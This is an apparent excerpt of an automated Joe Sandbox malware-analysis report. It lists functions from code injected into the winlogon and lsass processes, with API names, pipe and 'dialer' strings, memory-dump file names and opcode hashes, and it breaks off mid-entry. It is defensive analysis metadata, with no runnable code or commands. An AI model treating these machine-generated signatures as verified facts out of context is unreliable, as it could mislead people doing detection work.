                                                                  • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction ID: a85847b67241baf17023e07e2423d193898fd8a9f6832c40be14186a221c179b
                                                                  • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction Fuzzy Hash: 1D71F63A200FA1A2E736DFBE994C3AA67A4F784B86F548426DE4947FD8DE35C505C700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction ID: 0b476176dd215437889dc5df2a4e6f11728681cd4880218d94dbd171e8afe587
                                                                  • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction Fuzzy Hash: 5071E83A20CFA1A6E766DFEE98483AE7795F385B86F648056DE0B43799DE34C504C700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CallTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3163161869-2084237596
                                                                  • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction ID: 066c3195d6b19765af3cd44653234e3342ca3be28e8e599a30405b6f21608ec7
                                                                  • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction Fuzzy Hash: 57619C3B605F94DAEB20CFA9D48439D77A0F748B8AF148215EF4957B99DB38C485C700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction ID: bdc2000d3f24de824ac2d4aad0dd8e4e216f71541df1a140ad56c1d4500cd6f8
                                                                  • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction Fuzzy Hash: 6751276A204FA1E2F636DFADA46C3AA67A1F384782F548825DE4903FD9DE39C445C740
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction ID: eeae6fd4fd106a8d8e2af77007ce35b523d6da56c77ba8b82f46824129fdf85d
                                                                  • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction Fuzzy Hash: 88514C2A20CFA1A1E62ADFEDA46C3AA7791F385782F64C065CE4B43B89DE35C444C740
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: _log10_special
                                                                  • String ID: dll
                                                                  • API String ID: 3812965864-1037284150
                                                                  • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction ID: a033ca639208bb76df8529d98fb46130cd952fbec87511a36938c0d524ea7bf4
                                                                  • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction Fuzzy Hash: 95617329935F68ACD5639BBD9869325E71CFFA63C6F41D317E90B76A61DB389003C200
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID: U
                                                                  • API String ID: 442123175-4171548499
                                                                  • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction ID: 0274afc85186ba73af22fb5fc867c40b456c31728ce448c832b0fb41c8519a75
                                                                  • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction Fuzzy Hash: C441E776315E9092DB61CFA9E4483AA77A0FB98B95F908021EE4D877D4EF7CC441C741
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID: U
                                                                  • API String ID: 442123175-4171548499
                                                                  • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction ID: d57db7584a138c52917ddc7b342454cb98f343c5499785089f4aebbd3a489f1c
                                                                  • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction Fuzzy Hash: 96410776724E5092DB61CFA9E4483AE77A0F398785F508021EE4E87794DF3CC441CB40
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFileHeaderRaise
                                                                  • String ID: csm
                                                                  • API String ID: 2573137834-1018135373
                                                                  • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction ID: deee5491ab775c55da42ba5d39800ab26e82f5b6114056a9b353bb04cc1457c8
                                                                  • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction Fuzzy Hash: 7C112B36214F9492EB218F69E44435977E5FB88B95F588624EF8C07B98DF3CC552CB00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFileHeaderRaise
                                                                  • String ID: csm
                                                                  • API String ID: 2573137834-1018135373
                                                                  • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction ID: 0d275ce854d030e756eb79a42c121c6670bcaaf5448bbb4a099848c04caaf7ae
                                                                  • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction Fuzzy Hash: 44114936219F9092EB618F69E40425977E4F788B85F588264EF8D07B58DF38C552CB00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: `vector constructor iterator'$ctor closure'
                                                                  • API String ID: 592178966-3792692944
                                                                  • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction ID: 369ed350c5b8a5fa9f90472ddc939bdc9db8d7ed1e26dee6b27b1024de40b66b
                                                                  • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction Fuzzy Hash: 12E0CD61A41F44E0DF118F65E4842D873A0DB58B69F48D1229D5C07311FB38D1E9C300
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: ctor closure'$destructor iterator'
                                                                  • API String ID: 592178966-595914035
                                                                  • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction ID: 0c8c670500c278d5134ffcd7486f256337451b4d70f9b3fa90c17dbf0d8393ca
                                                                  • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction Fuzzy Hash: C8E0CD61A01F44E0DF118F65D4801D87360E758B59F88D122CD5C07311FB38D1E5C300
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                  • String ID: `scalar deleting destructor'$rFeaturePresent
                                                                  • API String ID: 1875163511-1689945142
                                                                  • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction ID: 8bb4a739cd02cdd81426781c51b70855e61a2b863bd89cb87c9d0e7e9bc9f89f
                                                                  • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction Fuzzy Hash: 9CD09E26612E94B5EE10EB58D889389A335F39435BF908521D14D419B5DF38CA4AD740
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 756756679-0
                                                                  • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction ID: cb710e214392adb98e7e1bc15610568e10cb2f2f52e749ec9d6a97ed601f99dd
                                                                  • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction Fuzzy Hash: CC118429A11F50D1EB15CBEEA40C21967A1FB89FD2F998129DF8D677A6DF38D442C300
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 756756679-0
                                                                  • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction ID: 8dafebc6d1d3c9367e8271f53e9954d881f86142d414424bbccf8574e8ef8368
                                                                  • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction Fuzzy Hash: BD118429A15F5091EB54CBEEA80C11977A1F789FD2F598124DF4E63725DF38D442C300
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction ID: 3f66ec7eff3bcd0e15884a61143856ea2199e44c5a4c1291958b41b9943c3ea9
                                                                  • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction Fuzzy Hash: 45E03935601E1086E704CBEAD80C349B7E1EB88F06F84C0248A890B392DF7DC499C741
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction ID: 6fcaa93aea724b91e8d158e9725c5533d957a52198547a3e80ddf154f2a01fa4
                                                                  • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction Fuzzy Hash: 2BE06D35621E1086E7548FEAD80C369B7E1FB98F06F14C024CA0907351DF7DC499CB40
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction ID: e2260efe5ca84f6892b78aa0f9e2a292f15a717dc4a8545187d79ec1f9b840bc
                                                                  • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction Fuzzy Hash: BEE0ED75611D5096E708DBEAD80C259B7A1FF88F16F84C024CA5907352DE388499C711
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction ID: b8c2929ccd3e035d4def54f83262ce4d1b8ced75698f8e2f7280696942ad402a
                                                                  • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction Fuzzy Hash: D6E0E575621E6096E7689BEAD80C269B7A1FB98B16F58C024CA0907321EE388499CA10

                                                                  Control-flow Graph

                                                                  • Graph image not reproduced; API calls shown on the graph nodes: NtQueryDirectoryFileEx, GetFileType, StrCpyW
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: File$DirectoryQueryType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 4175507832-91387939
                                                                  • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction ID: 7c144d842cfa7ee9069d61077705dc80e63a598e4779714d2bf260ea5e717718
                                                                  • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction Fuzzy Hash: DD719132204BC1C6FB65DF26989C3AE6794F785B84F560017DFA947B9ADE34CA18C740

                                                                  Control-flow Graph

                                                                  • Graph image not reproduced; API calls shown on the graph nodes: NtQuerySystemInformation, StrCmpNIW
                                                                  APIs
                                                                  • NtQuerySystemInformation.NTDLL ref: 00000202C0AE2147
                                                                  • StrCmpNIW.SHLWAPI ref: 00000202C0AE21B6
                                                                    • Part of subcall function 00000202C0AE31CC: GetProcessHeap.KERNEL32(?,?,?,?,?,00000202C0AE22ED), ref: 00000202C0AE31EF
                                                                    • Part of subcall function 00000202C0AE31CC: HeapAlloc.KERNEL32(?,?,?,?,?,00000202C0AE22ED), ref: 00000202C0AE3202
                                                                    • Part of subcall function 00000202C0AE31CC: StrCmpNIW.SHLWAPI(?,?,?,?,?,00000202C0AE22ED), ref: 00000202C0AE3277
                                                                    • Part of subcall function 00000202C0AE31CC: GetProcessHeap.KERNEL32(?,?,?,?,?,00000202C0AE22ED), ref: 00000202C0AE32DD
                                                                    • Part of subcall function 00000202C0AE31CC: HeapFree.KERNEL32(?,?,?,?,?,00000202C0AE22ED), ref: 00000202C0AE32EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                                  • String ID: S$dialer
                                                                  • API String ID: 722747020-3873981283
                                                                  • Opcode ID: 6a3425f5eaa1fa7964d7839e93a7c40b0f2b076159b3436a422c3db3c6fc66b9
                                                                  • Instruction ID: 2af22fa2d5a476c3eb6816d0402fe00be2f6e3f603dc11344672abf1fb5e6cd2
                                                                  • Opcode Fuzzy Hash: 6a3425f5eaa1fa7964d7839e93a7c40b0f2b076159b3436a422c3db3c6fc66b9
                                                                  • Instruction Fuzzy Hash: FC519D32B107A1C6FB60CB25D88CAAD73A5F704784F168527DFA557B8ADB38C869C740

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID:
                                                                  • API String ID: 517849248-0
                                                                  • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction ID: c48b0b101631eb508e742298692c669f51239643e556d9c0e71e58ac3d4616bf
